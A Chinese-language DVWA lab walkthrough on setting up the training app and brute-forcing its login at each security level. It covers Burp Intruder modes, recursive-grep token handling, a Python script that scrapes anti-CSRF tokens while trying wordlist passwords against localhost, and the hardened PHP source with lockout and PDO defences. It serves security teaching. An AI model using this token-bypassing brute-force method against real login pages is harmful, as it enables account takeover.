配置环境
将下载的DVWA放在www目录下,然后复制一份/config/config.inc.php.dist到当前目录,并且去掉.dist。
在phpMyadmin如果没有表dvwa,则新建一个表dvwa
db_user,db_password是数据库的账号和密码
之后找到DVWA的路径,找到下面的create/reset database点击(再次进入phpMyadmin查看表dvwa,表中已经有数据,密码用md5加密),等2秒自动跳转登录页面
输入账号admin,密码password
如果有乱码的情况
到DVWA安装目录下(…/WWW/DVWA-master/dvwa/includes)寻找文件dvwaPage.inc.php
打开这个文件,然后在全文查找charset=utf-8,将所有utf-8修改为gb2312。
注意:有好几处charset=utf-8,要全部修改成charset=gb2312。记得保存。
Brute Force
安全级别:Low
随便输入,然后抓包
send to intruder
选择破解参数并选择破解方式
四种暴力破解方式的区别:
一个字典,两个参数,先匹配第一项,再匹配第二项【sniper】
一个字典,两个参数,同用户名同密码【battering ram】
两个字典,两个参数,同行匹配,短的截止【pitch fork】
两个字典,两个参数,交叉匹配,所有可能【cluster bomb】
长度不一样的有可能是正确的
成功了
使用sql注入的方式也可以
安全级别:Medium
先看源码,过滤掉了mysql语句中的字符
mysql_real_excape_string()函数转义sql语句中使用的字符串中的特殊字符,防止sql注入;
同时对密码进行了md5加密,杜绝通过参数password进行sql注入的可能性
但是没有加入有效的防爆破机制
使用sql注入,但是失败了
使用上关的爆破步骤
安全级别:High
参考源码
mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符;
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠,可用于清理从数据库中或者从 HTML表单中取回的数据;
破解过程
通过抓包,我们发现了需要提交四个参数:username,password,login,user_token
每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查
可以尝试使用python脚本,使用爬虫将服务器每次返回的user_token抓取到
1.使用burp suit破解
设置两个参数password和user_token,攻击类型为pitchfork
设置参数,在option选项卡中将攻击线程thread设置为1,因为Recursive_Grep模式不支持多线程攻击,然后选择Grep-Extract,意思是用于提取响应消息中的有用信息,点击add,最后将Redirections设置为always
然后设置payload,第一个参数设置不在赘述,第二个参数选择Recursive grep,然后将options中的token作为第一次请求的初始值
start attack,结果如下
2.利用python脚本对password参数进行爆破
from bs4 import BeautifulSoup
from urllib.request import Request,urlopen
header = {
'Host': '127.0.0.1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Referer': 'http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/brute/',
'Cookie': 'security=high; PHPSESSID=b9d2b7ee1eaeb87cf2f84b6cd173ff2a',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
requrl = "http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/brute/"
def get_token(requrl, header):
req = Request(url=requrl, headers=header)
response = urlopen(req)
print(response.getcode())
the_page = response.read().decode()
# print(the_page)
print(len(the_page))
soup = BeautifulSoup(the_page, "html.parser")
# print '###################'
# print soup.find_all('input')[3].get('value')
user_token = soup.find_all('input')[3].get('value')
# user_token = soup.form.input.input.input.input["value"]
return user_token
user_token = get_token(requrl, header)
i = 0
for line in open('./password.txt'):
requrl = "http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/brute/" + "?username=admin&password=" + line.strip() + "&Login=Login&user_token=" + user_token
i = i + 1
print(i, 'admin', line.strip())
user_token = get_token(requrl, header)
print(user_token)
if i == 10:
break
安全级别:Impossible
<?php
if( isset( $_POST[ 'Login' ] ) && isset ($_POST['username']) && isset ($_POST['password']) ) {
// Check Anti-CSRF token -------校验token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Sanitise username input----------过滤、转义用户输入的username
$user = $_POST[ 'username' ];
$user = stripslashes( $user );
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitise password input----------过滤、转义用户输入的password
$pass = $_POST[ 'password' ];
$pass = stripslashes( $pass );
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Default values
$total_failed_login = 3;
$lockout_time = 15;
$account_locked = false;
// Check the database (Check user information)
// 用了更为安全的PDO(PHP Data Object)机制防御sql注入,这是因为不能使用PDO扩展本身执行任何数据库操作,而sql注入的关键就是通过破坏sql语句结构执行恶意的sql命令
$data = $db->prepare( 'SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// Check to see if the user has been locked out.----登录失败锁定机制:3次失败,锁定15分钟
if( ( $data->rowCount() == 1 ) && ( $row[ 'failed_login' ] >= $total_failed_login ) ) {
// User locked out. Note, using this method would allow for user enumeration!
//echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";
// Calculate when the user would be allowed to login again
$last_login = strtotime( $row[ 'last_login' ] );
$timeout = $last_login + ($lockout_time * 60);
$timenow = time();
/*
print "The last login was: " . date ("h:i:s", $last_login) . "<br />";
print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";
print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";
*/
// Check to see if enough time has passed, if it hasn't locked the account
if( $timenow < $timeout ) {
$account_locked = true;
// print "The account is locked<br />";
}
}
// Check the database (if username matches the password)----尝试登录,PDO机制防御SQL注入
$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR);
$data->bindParam( ':password', $pass, PDO::PARAM_STR );
$data->execute();
$row = $data->fetch();
// If its a valid login...
if( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {
// Get users details
$avatar = $row[ 'avatar' ];
$failed_login = $row[ 'failed_login' ];
$last_login = $row[ 'last_login' ];
// Login successful
echo "<p>Welcome to the password protected area <em>{$user}</em></p>";
echo "<img src=\"{$avatar}\" />";
// Had the account been locked out since last login?
if( $failed_login >= $total_failed_login ) {
echo "<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";
echo "<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>${last_login}</em>.</p>";
}
// Reset bad login count
$data = $db->prepare( 'UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
} else {
// Login failed----如果登录失败,随机等待2-4秒后再返回错误信息
sleep( rand( 2, 4 ) );
// Give the user some feedback
echo "<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";
// Update bad login count
$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Set the last login time
$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );
$data->bindParam( ':user', $user, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
